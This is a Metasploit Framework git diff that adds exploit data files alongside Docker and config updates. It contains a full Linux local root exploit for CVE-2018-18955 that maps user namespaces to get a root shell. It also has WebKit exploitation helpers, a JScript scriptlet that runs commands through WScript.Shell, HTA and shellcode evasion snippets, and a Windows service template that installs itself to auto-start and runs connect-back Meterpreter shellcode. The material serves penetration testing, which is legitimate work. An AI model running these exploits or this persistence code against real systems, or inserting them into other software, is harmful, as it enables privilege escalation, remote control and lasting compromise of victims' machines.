adapter: postgresql
database: metasploit_framework_development
username: postgres
pool: 5
pool: 25
timeout: 5
# Warning: The database defined as "test" will be erased and

11
data/cpuinfo/build.sh
View File

@ -1,11 +0,0 @@
#!/bin/sh
gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
strip cpuinfo.ia32.bin && \
gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
strip cpuinfo.ia64.bin && \
i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
strip cpuinfo.exe
ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe

64
data/cpuinfo/cpuinfo.c
View File

@ -1,64 +0,0 @@
// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
/*
#!/usr/bin/env ruby
# This file is part of Metasm, the Ruby assembly manipulation suite
# Copyright (C) 2006-2009 Yoann GUILLOT
#
# Licence is LGPL, see LICENCE in the top-level directory
#
# this sample shows the compilation of a slightly more complex program
# it displays in a messagebox the result of CPUID
#
*/
#include <unistd.h>
#include <stdio.h>
static char *featureinfo[32] = {
"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
}, *extendinfo[32] = {
"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
};
#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
int main(void)
{
unsigned long eax, ebx, ecx, edx;
unsigned long i;
cpuid(0);
fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
cpuid(1);
fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
fprintf(stdout, "FLAGS:");
for (i=0 ; i<32 ; i++)
if (edx & (1 << i))
fprintf(stdout, " %s", featureinfo[i]);
for (i=0 ; i<32 ; i++)
if (ecx & (1 << i))
fprintf(stdout, " %s", extendinfo[i]);
fprintf(stdout, "\n");
fflush(stdout);
return 0;
}

BIN
data/cpuinfo/cpuinfo.exe
View File

Binary file not shown.

BIN
data/cpuinfo/cpuinfo.ia32.bin
View File

Binary file not shown.

BIN
data/cpuinfo/cpuinfo.ia64.bin
View File

Binary file not shown.

BIN
data/exploits/CVE-2012-6636/armeabi/libndkstager.so Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2012-6636/mips/libndkstager.so Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2012-6636/x86/libndkstager.so Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2016-4557/suidhelper
View File

Binary file not shown.

BIN
data/exploits/CVE-2018-0824/UnmarshalPwn.exe Normal file
View File

Binary file not shown.

16
data/exploits/CVE-2018-0824/script_template Normal file
View File

@ -0,0 +1,16 @@
<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
description='Dummy'
progid='giffile'
version='1.00'
remotable='True'>
</registration>
<script language='JScript'>
<![CDATA[
var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
]]>
</script>
</component>
</package>

182
data/exploits/CVE-2018-4233/int64.js Normal file
View File

@ -0,0 +1,182 @@
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
// Requires utils.js
//
// Datatype to represent 64-bit integers.
//
// Internally, the integer is stored as a Uint8Array in little endian byte order.
function Int64(v) {
// The underlying byte array.
var bytes = new Uint8Array(8);
switch (typeof v) {
case 'number':
v = '0x' + Math.floor(v).toString(16);
case 'string':
if (v.startsWith('0x'))
v = v.substr(2);
if (v.length % 2 == 1)
v = '0' + v;
var bigEndian = unhexlify(v, 8);
bytes.set(Array.from(bigEndian).reverse());
break;
case 'object':
if (v instanceof Int64) {
bytes.set(v.bytes());
} else {
if (v.length != 8)
throw TypeError("Array must have excactly 8 elements.");
bytes.set(v);
}
break;
case 'undefined':
break;
default:
throw TypeError("Int64 constructor requires an argument.");
}
// Return a double whith the same underlying bit representation.
this.asDouble = function() {
// Check for NaN
if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
throw new RangeError("Integer can not be represented by a double");
return Struct.unpack(Struct.float64, bytes);
};
// Return a javascript value with the same underlying bit representation.
// This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
// due to double conversion constraints.
this.asJSValue = function() {
if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
throw new RangeError("Integer can not be represented by a JSValue");
// For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
this.assignSub(this, 0x1000000000000);
var res = Struct.unpack(Struct.float64, bytes);
this.assignAdd(this, 0x1000000000000);
return res;
};
// Return the underlying bytes of this number as array.
this.bytes = function() {
return Array.from(bytes);
};
// Return the byte at the given index.
this.byteAt = function(i) {
return bytes[i];
};
// Return the value of this number as unsigned hex string.
this.toString = function() {
return '0x' + hexlify(Array.from(bytes).reverse());
};
// Basic arithmetic.
// These functions assign the result of the computation to their 'this' object.
// Decorator for Int64 instance operations. Takes care
// of converting arguments to Int64 instances if required.
function operation(f, nargs) {
return function() {
if (arguments.length != nargs)
throw Error("Not enough arguments for function " + f.name);
for (var i = 0; i < arguments.length; i++)
if (!(arguments[i] instanceof Int64))
arguments[i] = new Int64(arguments[i]);
return f.apply(this, arguments);
};
}
// this = -n (two's complement)
this.assignNeg = operation(function neg(n) {
for (var i = 0; i < 8; i++)
bytes[i] = ~n.byteAt(i);
return this.assignAdd(this, Int64.One);
}, 1);
// this = a + b
this.assignAdd = operation(function add(a, b) {
var carry = 0;
for (var i = 0; i < 8; i++) {
var cur = a.byteAt(i) + b.byteAt(i) + carry;
carry = cur > 0xff | 0;
bytes[i] = cur;
}
return this;
}, 2);
// this = a - b
this.assignSub = operation(function sub(a, b) {
var carry = 0;
for (var i = 0; i < 8; i++) {
var cur = a.byteAt(i) - b.byteAt(i) - carry;
carry = cur < 0 | 0;
bytes[i] = cur;
}
return this;
}, 2);
// this = a ^ b
this.assignXor = operation(function sub(a, b) {
for (var i = 0; i < 8; i++) {
bytes[i] = a.byteAt(i) ^ b.byteAt(i);
}
return this;
}, 2);
// this = a & b
this.assignAnd = operation(function sub(a, b) {
for (var i = 0; i < 8; i++) {
bytes[i] = a.byteAt(i) & b.byteAt(i);
}
return this;
}, 2)
}
// Constructs a new Int64 instance with the same bit representation as the provided double.
Int64.fromDouble = function(d) {
var bytes = Struct.pack(Struct.float64, d);
return new Int64(bytes);
};
// Convenience functions. These allocate a new Int64 to hold the result.
// Return -n (two's complement)
function Neg(n) {
return (new Int64()).assignNeg(n);
}
// Return a + b
function Add(a, b) {
return (new Int64()).assignAdd(a, b);
}
// Return a - b
function Sub(a, b) {
return (new Int64()).assignSub(a, b);
}
// Return a ^ b
function Xor(a, b) {
return (new Int64()).assignXor(a, b);
}
// Return a & b
function And(a, b) {
return (new Int64()).assignAnd(a, b);
}
// Some commonly used numbers.
Int64.Zero = new Int64(0);
Int64.One = new Int64(1);
// That's all the arithmetic we need for exploiting WebKit.. :)

BIN
data/exploits/CVE-2018-4233/stage1.bin Normal file
View File

Binary file not shown.

78
data/exploits/CVE-2018-4233/utils.js Normal file
View File

@ -0,0 +1,78 @@
//
// Utility functions.
//
// Copyright (c) 2016 Samuel Groß
//
// Return the hexadecimal representation of the given byte.
function hex(b) {
return ('0' + b.toString(16)).substr(-2);
}
// Return the hexadecimal representation of the given byte array.
function hexlify(bytes) {
var res = [];
for (var i = 0; i < bytes.length; i++)
res.push(hex(bytes[i]));
return res.join('');
}
// Return the binary data represented by the given hexdecimal string.
function unhexlify(hexstr) {
if (hexstr.length % 2 == 1)
throw new TypeError("Invalid hex string");
var bytes = new Uint8Array(hexstr.length / 2);
for (var i = 0; i < hexstr.length; i += 2)
bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
return bytes;
}
function hexdump(data) {
if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
data = Array.from(data);
var lines = [];
for (var i = 0; i < data.length; i += 16) {
var chunk = data.slice(i, i+16);
var parts = chunk.map(hex);
if (parts.length > 8)
parts.splice(8, 0, ' ');
lines.push(parts.join(' '));
}
return lines.join('\n');
}
// Simplified version of the similarly named python module.
var Struct = (function() {
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
var buffer = new ArrayBuffer(8);
var byteView = new Uint8Array(buffer);
var uint32View = new Uint32Array(buffer);
var float64View = new Float64Array(buffer);
return {
pack: function(type, value) {
var view = type; // See below
view[0] = value;
return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
},
unpack: function(type, bytes) {
if (bytes.length !== type.BYTES_PER_ELEMENT)
throw Error("Invalid bytearray");
var view = type; // See below
byteView.set(bytes);
return view[0];
},
// Available types.
int8: byteView,
int32: uint32View,
float64: float64View
};
})();

BIN
data/exploits/CVE-2018-4237/ssudo Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2018-4404/stage2.dylib Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe Executable file
View File

Binary file not shown.

52
data/exploits/cve-2018-18955/subshell.c Normal file
View File

@ -0,0 +1,52 @@
// subshell.c
// author: Jann Horn
// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
#define _GNU_SOURCE
#include <unistd.h>
#include <grp.h>
#include <err.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sched.h>
#include <sys/wait.h>
int main() {
int sync_pipe[2];
char dummy;
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
pid_t child = fork();
if (child == -1) err(1, "fork");
if (child == 0) {
close(sync_pipe[1]);
if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
execl("/bin/bash", "bash", NULL);
err(1, "exec");
}
close(sync_pipe[0]);
if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
char pbuf[100];
sprintf(pbuf, "/proc/%d", (int)child);
if (chdir(pbuf)) err(1, "chdir");
const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
int uid_map = open("uid_map", O_WRONLY);
if (uid_map == -1) err(1, "open uid map");
if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
close(uid_map);
int gid_map = open("gid_map", O_WRONLY);
if (gid_map == -1) err(1, "open gid map");
if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
close(gid_map);
if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
int status;
if (wait(&status) != child) err(1, "wait");
return 0;
}

BIN
data/exploits/cve-2018-18955/subshell.out Normal file
View File

Binary file not shown.

272
data/exploits/cve-2018-18955/subuid_shell.c Normal file
View File

@ -0,0 +1,272 @@
// subuid_shell.c - Linux local root exploit for CVE-2018-18955
// Exploits broken uid/gid mapping in nested user namespaces.
// ---
// Mostly stolen from Jann Horn's exploit:
// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
// Some code stolen from Xairy's exploits:
// - https://github.com/xairy/kernel-exploits
// ---
// <bcoles@gmail.com>
// - added auto subordinate id mapping
// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <sched.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/prctl.h>
#define DEBUG
#ifdef DEBUG
# define dprintf printf
#else
# define dprintf
#endif
char* SUBSHELL = "./subshell";
// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
#define CHUNK_SIZE 1024
int read_file(const char* file, char* buffer, int max_length) {
int f = open(file, O_RDONLY);
if (f == -1)
return -1;
int bytes_read = 0;
while (1) {
int bytes_to_read = CHUNK_SIZE;
if (bytes_to_read > max_length - bytes_read)
bytes_to_read = max_length - bytes_read;
int rv = read(f, &buffer[bytes_read], bytes_to_read);
if (rv == -1)
return -1;
bytes_read += rv;
if (rv == 0)
return bytes_read;
}
}
static int write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return -1;
if (write(fd, buf, len) != len) {
close(fd);
return -1;
}
close(fd);
return 0;
}
// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
int get_subuid(char* output, int max_length) {
char buffer[1024];
char* path = "/etc/subuid";
int length = read_file(path, &buffer[0], sizeof(buffer));
if (length == -1)
return -1;
int real_uid = getuid();
struct passwd *u = getpwuid(real_uid);
char needle[1024];
sprintf(needle, "%s:", u->pw_name);
int needle_length = strlen(needle);
char* found = memmem(&buffer[0], length, needle, needle_length);
if (found == NULL)
return -1;
int i;
for (i = 0; found[needle_length + i] != ':'; i++) {
if (i >= max_length)
return -1;
if ((found - &buffer[0]) + needle_length + i >= length)
return -1;
output[i] = found[needle_length + i];
}
return 0;
}
int get_subgid(char* output, int max_length) {
char buffer[1024];
char* path = "/etc/subgid";
int length = read_file(path, &buffer[0], sizeof(buffer));
if (length == -1)
return -1;
int real_gid = getgid();
struct group *g = getgrgid(real_gid);
char needle[1024];
sprintf(needle, "%s:", g->gr_name);
int needle_length = strlen(needle);
char* found = memmem(&buffer[0], length, needle, needle_length);
if (found == NULL)
return -1;
int i;
for (i = 0; found[needle_length + i] != ':'; i++) {
if (i >= max_length)
return -1;
if ((found - &buffer[0]) + needle_length + i >= length)
return -1;
output[i] = found[needle_length + i];
}
return 0;
}
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
int main(int argc, char** argv) {
if (argc > 1) SUBSHELL = argv[1];
dprintf("[.] starting\n");
dprintf("[.] setting up namespace\n");
int sync_pipe[2];
char dummy;
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
dprintf("[-] pipe\n");
exit(EXIT_FAILURE);
}
pid_t child = fork();
if (child == -1) {
dprintf("[-] fork");
exit(EXIT_FAILURE);
}
if (child == 0) {
prctl(PR_SET_PDEATHSIG, SIGKILL);
close(sync_pipe[1]);
if (unshare(CLONE_NEWUSER) != 0) {
dprintf("[-] unshare(CLONE_NEWUSER)\n");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
dprintf("[-] unshare(CLONE_NEWNET)\n");
exit(EXIT_FAILURE);
}
if (write(sync_pipe[0], "X", 1) != 1) {
dprintf("write to sock\n");
exit(EXIT_FAILURE);
}
if (read(sync_pipe[0], &dummy, 1) != 1) {
dprintf("[-] read from sock\n");
exit(EXIT_FAILURE);
}
if (setgid(0)) {
dprintf("[-] setgid");
exit(EXIT_FAILURE);
}
if (setuid(0)) {
printf("[-] setuid");
exit(EXIT_FAILURE);
}
execl(SUBSHELL, "", NULL);
dprintf("[-] executing subshell failed\n");
}
close(sync_pipe[0]);
if (read(sync_pipe[1], &dummy, 1) != 1) {
dprintf("[-] read from sock\n");
exit(EXIT_FAILURE);
}
char path[256];
sprintf(path, "/proc/%d/setgroups", (int)child);
if (write_file(path, "deny") == -1) {
dprintf("[-] denying setgroups failed\n");
exit(EXIT_FAILURE);
}
dprintf("[~] done, namespace sandbox set up\n");
dprintf("[.] mapping subordinate ids\n");
char subuid[64];
char subgid[64];
if (get_subuid(&subuid[0], sizeof(subuid))) {
dprintf("[-] couldn't find subuid map in /etc/subuid\n");
exit(EXIT_FAILURE);
}
if (get_subgid(&subgid[0], sizeof(subgid))) {
dprintf("[-] couldn't find subgid map in /etc/subgid\n");
exit(EXIT_FAILURE);
}
dprintf("[.] subuid: %s\n", subuid);
dprintf("[.] subgid: %s\n", subgid);
char cmd[256];
sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
if (system(cmd)) {
dprintf("[-] newuidmap failed");
exit(EXIT_FAILURE);
}
sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
if (system(cmd)) {
dprintf("[-] newgidmap failed");
exit(EXIT_FAILURE);
}
dprintf("[~] done, mapped subordinate ids\n");
dprintf("[.] executing subshell\n");
if (write(sync_pipe[1], "X", 1) != 1) {
dprintf("[-] write to sock");
exit(EXIT_FAILURE);
}
int status;
if (wait(&status) != child) {
dprintf("[-] wait");
exit(EXIT_FAILURE);
}
return 0;
}

BIN
data/exploits/cve-2018-18955/subuid_shell.out Normal file
View File

Binary file not shown.

3
data/exploits/evasion_shellcode.js
View File

@ -72,5 +72,6 @@ function ShellCodeExec()
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
try{
ShellCodeExec();
}catch(e){}

3
data/exploits/hta_evasion.hta
View File

@ -141,8 +141,9 @@
var objShell = new ActiveXObject("WScript.shell");
var js_f = path + "\\\\<%= fname %>.js";
var ex = path + "\\\\<%= fname %>.exe";
var platform = "/platform:<%= arch %>";
objShell.run(comPath + " /out:" + ex + " " + js_f);
objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
while(!fso.FileExists(ex)) { }
objShell.run(ex, 0);

BIN
data/exploits/juicypotato/juicypotato.x64.dll Normal file
View File

Binary file not shown.

BIN
data/exploits/juicypotato/juicypotato.x86.dll Normal file
View File

Binary file not shown.

304
data/exploits/persistence_service/service.erb Normal file
View File

@ -0,0 +1,304 @@
#include <String.h>
#include <Windows.h>
#include <stdlib.h>
#include <stdio.h>
#define SERVICE_NAME <%= @service_name.inspect %>
#define DISPLAY_NAME <%= @service_description.inspect %>
#define RETRY_TIME <%= @retry_time %>
//
// Globals
//
SERVICE_STATUS status;
SERVICE_STATUS_HANDLE hStatus;
//
// Meterpreter connect back to host
//
void start_meterpreter()
{
// Your meterpreter shell here
<%= buf %>
LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(buffer,buf,sizeof(buf));
HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
WaitForSingleObject(hThread, -1); //INFINITE
CloseHandle(hThread);
}
//
// Call self without parameter to start meterpreter
//
void self_call()
{
char path[MAX_PATH];
char cmd[MAX_PATH];
if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
// Get module file name failed
return;
}
STARTUPINFO startup_info;
PROCESS_INFORMATION process_information;
ZeroMemory(&startup_info, sizeof(startup_info));
startup_info.cb = sizeof(startup_info);
ZeroMemory(&process_information, sizeof(process_information));
// If create process failed.
// CREATE_NO_WINDOW = 0x08000000
if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
NULL, &startup_info, &process_information) == 0)
{
return;
}
// Wait until the process died.
WaitForSingleObject(process_information.hProcess, -1);
}
//
// Process control requests from the Service Control Manager
//
VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
{
switch (fdwControl) {
case SERVICE_CONTROL_STOP:
case SERVICE_CONTROL_SHUTDOWN:
status.dwWin32ExitCode = 0;
status.dwCurrentState = SERVICE_STOPPED;
break;
case SERVICE_CONTROL_PAUSE:
status.dwWin32ExitCode = 0;
status.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
status.dwWin32ExitCode = 0;
status.dwCurrentState = SERVICE_RUNNING;
break;
default:
break;
}
if (SetServiceStatus(hStatus, &status) == 0) {
//printf("Cannot set service status (0x%08x)", GetLastError());
exit(1);
}
return;
}
//
// Main function of service
//
VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
{
// Register the service handler
hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
if (hStatus == 0) {
//printf("Cannot register service handler (0x%08x)", GetLastError());
exit(1);
}
// Initialize the service status structure
status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
status.dwCurrentState = SERVICE_RUNNING;
status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
status.dwWin32ExitCode = 0;
status.dwServiceSpecificExitCode = 0;
status.dwCheckPoint = 0;
status.dwWaitHint = 0;
if (SetServiceStatus(hStatus, &status) == 0) {
//printf("Cannot set service status (0x%08x)", GetLastError());
return;
}
// Start the Meterpreter
while (status.dwCurrentState == SERVICE_RUNNING) {
self_call();
Sleep(RETRY_TIME);
}
return;
}
//
// Installs and starts the Meterpreter service
//
BOOL install_service()
{
SC_HANDLE hSCManager;
SC_HANDLE hService;
char path[MAX_PATH];
// Get the current module name
if (!GetModuleFileName(NULL, path, MAX_PATH)) {
//printf("Cannot get module name (0x%08x)", GetLastError());
return FALSE;
}
// Build the service command line
char cmd[MAX_PATH];
int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
if (total_len < 0 || total_len >= sizeof(cmd)){
//printf("Cannot build service command line (0x%08x)", -1);
return FALSE;
}
cmd[0] = '\0';
strcat(cmd, "\"");
strcat(cmd, path);
strcat(cmd, "\" <%= @start_cmd %>");
// Open the service manager
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
if (hSCManager == NULL) {
//printf("Cannot open service manager (0x%08x)", GetLastError());
return FALSE;
}
// Create the service
hService = CreateService(
hSCManager,
SERVICE_NAME,
DISPLAY_NAME,
0xf01ff, // SERVICE_ALL_ACCESS
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
cmd,
NULL,
NULL,
NULL,
NULL, /* LocalSystem account */
NULL
);
if (hService == NULL) {
//printf("Cannot create service (0x%08x)", GetLastError());
CloseServiceHandle(hSCManager);
return FALSE;
}
// Start the service
char* args[] = { path, "service" };
if (StartService(hService, 2, (const char**)&args) == 0) {
DWORD err = GetLastError();
if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
{
//printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
return FALSE;
}
}
// Cleanup
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
//printf("Service %s successfully installed.", SERVICE_NAME);
return TRUE;
}
//
// Start the service
//
void start_service()
{
SERVICE_TABLE_ENTRY ServiceTable[] =
{
{ SERVICE_NAME, &ServiceMain },
{ NULL, NULL }
};
if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
//printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
exit(1);
}
}
//
// Main function
//
int main()
{
// Parse the command line argument.
// For now, int main(int argc, char *argv) is buggy with metasm.
// So we choose this approach to achieve it.
LPTSTR cmdline;
cmdline = GetCommandLine();
char *argv[MAX_PATH];
char * ch = strtok(cmdline," ");
int argc = 0;
while (ch != NULL)
{
argv[argc] = malloc( strlen(ch)+1) ;
strncpy(argv[argc], ch, strlen(ch)+1);
ch = strtok (NULL, " ");
argc++;
}
if (argc > 1) {
if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
// Installs and starts the service
install_service();
return 0;
}
else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
// Starts the Meterpreter as a service
start_service();
return 0;
}
}
// Starts the Meterpreter as a normal application
start_meterpreter();
return 0;
}

13
data/headers/windows/Windows.h
View File

@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
} OVERLAPPED, *LPOVERLAPPED;
typedef DWORD SERVICE_STATUS_HANDLE;
typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
typedef struct _SERVICE_TABLE_ENTRY {
LPSTR lpServiceName;
LPSERVICE_MAIN_FUNCTION lpServiceProc;
} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
typedef enum _SC_ENUM_TYPE {
SC_ENUM_PROCESS_INFO = 0
@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
WINAPI void SetLastError __attribute__((dllimport))(DWORD);
WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);

2
data/headers/windows/stdlib.h
View File

@ -44,3 +44,5 @@ int system(const char*);
long int labs(long int);
div_t div(int, int);
ldiv_t ldiv(long int, long int);
void* malloc (size_t size);

2
data/logos/under-construction-v5.txt → data/logos/metasploit-v5.txt
View File

@ -22,4 +22,4 @@ xMMMMMMMMMd ,0MMMMMMMMMMK;
%red 'oOWMMMMMMMMo%clr +:+
%red .,cdkO0K;%clr :+: :+:
:::::::+:
%whiMetasploit%clr %yelUnder Construction%clr
%whiMetasploit%clr

BIN
data/meterpreter/x64_osx_stage
View File

Binary file not shown.

921
data/wordlists/joomla.txt
View File

File diff suppressed because it is too large Load Diff

1
data/wordlists/unix_users.txt
View File

@ -16,6 +16,7 @@ bin
checkfs
checkfsys
checksys
chronos
cmwlogin
couchdb
daemon

1
data/ysoserial_payloads.json Normal file
View File

File diff suppressed because one or more lines are too long

3886
db/modules_metadata_base.json
View File

File diff suppressed because it is too large Load Diff

2
docker-compose.override.yml
View File

@ -9,6 +9,6 @@ services:
BUNDLER_ARGS: --jobs=8
image: metasploit:dev
environment:
DATABASE_URL: postgres://postgres@db:5432/msf_dev
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
volumes:
- .:/usr/src/metasploit-framework

3
docker-compose.yml
View File

@ -3,14 +3,13 @@ services:
ms:
image: metasploitframework/metasploit-framework:latest
environment:
DATABASE_URL: postgres://postgres@db:5432/msf
DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
links:
- db
ports:
- 4444:4444
volumes:
- $HOME/.msf4:/home/msf/.msf4
- /etc/localtime:/etc/localtime:ro
db:
image: postgres:10-alpine

5
docker/database.yml Normal file
View File

@ -0,0 +1,5 @@
development: &pgsql
url: <%= ENV['DATABASE_URL'] %>
production: &production
<<: *pgsql

35
docker/entrypoint.sh
View File

@ -5,16 +5,27 @@ MSF_GROUP=msf
TMP=${MSF_UID:=1000}
TMP=${MSF_GID:=1000}
# don't recreate system users like root
if [ "$MSF_UID" -lt "1000" ]; then
MSF_UID=1000
# if the user starts the container as root or another system user,
# don't use a low privileged user as we mount the home directory
if [ "$MSF_UID" -eq "0" ]; then
"$@"
else
# if the users group already exists, create a random GID, otherwise
# reuse it
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
addgroup -g $MSF_GID $MSF_GROUP
else
addgroup $MSF_GROUP
fi
# check if user id already exists
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
# add user to metasploit group so it can read the source
addgroup $MSF_USER $METASPLOIT_GROUP
su-exec $MSF_USER "$@"
# fall back to root exec if the user id already exists
else
"$@"
fi
fi
if [ "$MSF_GID" -lt "1000" ]; then
MSF_GID=1000
fi
addgroup -g $MSF_GID $MSF_GROUP
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
su-exec $MSF_USER "$@"

23
documentation/api/v1/auth_api_doc.rb
View File

@ -15,26 +15,21 @@ module AuthApiDoc
end
swagger_path '/api/v1/auth/generate-token' do
# Swagger documentation for /api/v1/auth/generate-token GET
operation :get do
# Swagger documentation for /api/v1/auth/generate-token POST
operation :post do
key :description, 'Return a valid Authorization Bearer token.'
key :tags, [ 'auth' ]
parameter do
key :name, :username
key :in, :query
key :description, 'The username for the user you want to authenticate.'
key :in, :body
key :name, :body
key :description, 'Login credentials for the user who will be generating a token.'
key :required, true
key :type, :string
end
parameter do
key :name, :password
key :in, :query
key :description, 'The password for the user you want to authenticate.'
key :required, true
key :type, :string
schema do
property :username, type: :string, required: true
property :password, type: :string, required: true
end
end
response 200 do

18
